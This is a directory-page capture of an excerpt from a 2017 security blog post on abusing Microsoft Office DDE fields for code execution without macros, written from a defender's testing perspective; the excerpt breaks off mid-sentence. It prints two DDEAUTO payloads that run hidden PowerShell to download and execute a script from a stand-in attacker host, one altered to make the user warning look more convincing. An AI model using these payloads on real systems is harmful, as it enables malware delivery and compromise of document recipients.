www.securitysift.com - Security Sift | Sifting through the world of Information Security, one bit at a time

home - domains - www.securitysift.com

Goto Site

https://www.securitysift.com/

Site Description

Sifting through the world of Information Security, one bit at a time

Example Site Content

Security Sift | Sifting through the world of Information Security, one bit at a time Home About My Library Security Sift Sifting through the world of Information Security, one bit at a time Sift: to examine (something) thoroughly so as to isolate that which is most important -- Oxford Dictionary Abusing Microsoft Office DDE Written by:Mike Czumak Written on:October 23, 2017 Comments are closed Introduction Earlier this month I came across a post by the team at SensePost outlining their macro-less code execution technique using the antiquated DDE feature of Microsoft Word. As you may be aware, this feature has existed in Office for many years and was even written about over 15 years ago as a potential threat vector. Old or not, as we continue to put up obstacles in front of malicious actors in the form of disabling macros and other code execution restrictions, attacks are going to adapt and use whatever works, regardless of age so I saw this as viable vector worth exploring further. I’m always interested in testing these type of techniques so I can better understand how to protect an Enterprise from such attacks and while I have posted some findings sporadically to Twitter, I wanted to better centralize my results. What follows is a synopsis of my test notes. Testing in Word The team at SensePost did a good job of outlining the technique in Word and I won’t rehash their notes so if you’re not familiar, I encourage you to check out the link in the Introduction. Modifying the user warning If you are familiar, you’ll know that simply opening a Word document with a DDEAUTO field is enough to execute it, though the user will be presented with several prompts, the first two of which are required to be answered “Yes” in order for successful execution. The first prompt is generic and simply reads as follows: The second prompt actually incorporates portions of the DDEAUTO command and therefore could make a more discerning user a bit suspicious, depending on what is being executed (in the below case, just Calc.exe).   One of the things that piqued my interest in the SensePost article was the following statement: The second prompt asks the user whether or not they want to execute the specified application, now this can be considered as a security warning since it asks the user to execute “cmd.exe”, however with proper syntax modification it can be hidden I began modifying the syntax and, using their example of executing a remote Powershell script, went from this… { DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "} … to this … { DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://[evil_ip]/shell.txt');powershell $e # " "for security reasons"}   Aside from opting to call Powershell directly, the key difference here is the directory manipulation and message verbiage added as the second parameter of the DDEAUTO command, which results in a potentially more convincing prompt:   It wasn’t long before this technique was being observed in the wild: https://twitter.com/GossiTheDog/status/919686197047451653 Finding vulnerable file types If you’re responsible for the security of an organization/enterprise you know that file types can make all the difference when when determining whether your detection and prevention solutions are adequate. For example, maybe you sandbox email attachments and that technology may do a good job scanning .doc or docx., but what about Word XML? Turns out, as long as Word is set as the default parser, the following file types can all be used as a vector: doc(x/m), dot(x/m), rtf, and Word xml. I’ll post the prevention steps at the end of this article, but note that if for whatever reason you cannot apply those registry settings (or you don’t manage all of the workstations in your environment) you should consider how else you might detect/prevent DDE should it come in via any of the above file types. Also note that Word files can be embedded in other office documents (Publisher, PowerPoint, etc.) so it’s not always as straightforward as identifying these particular file types in email attachments. Testing in Outlook While Word was presented as the threat vector by Sensepost, I was also curious about Outlook file types as these could be much harder to detect. Since Outlook uses Word as its native parser, I found that attaching a draft message (.msg) or tempate (.oft) file would also execute the DDE should a user open that attachment: While certainly important to know (are you scanning all .msg attachments as they come into your environment?), I was mor

Websites with similar content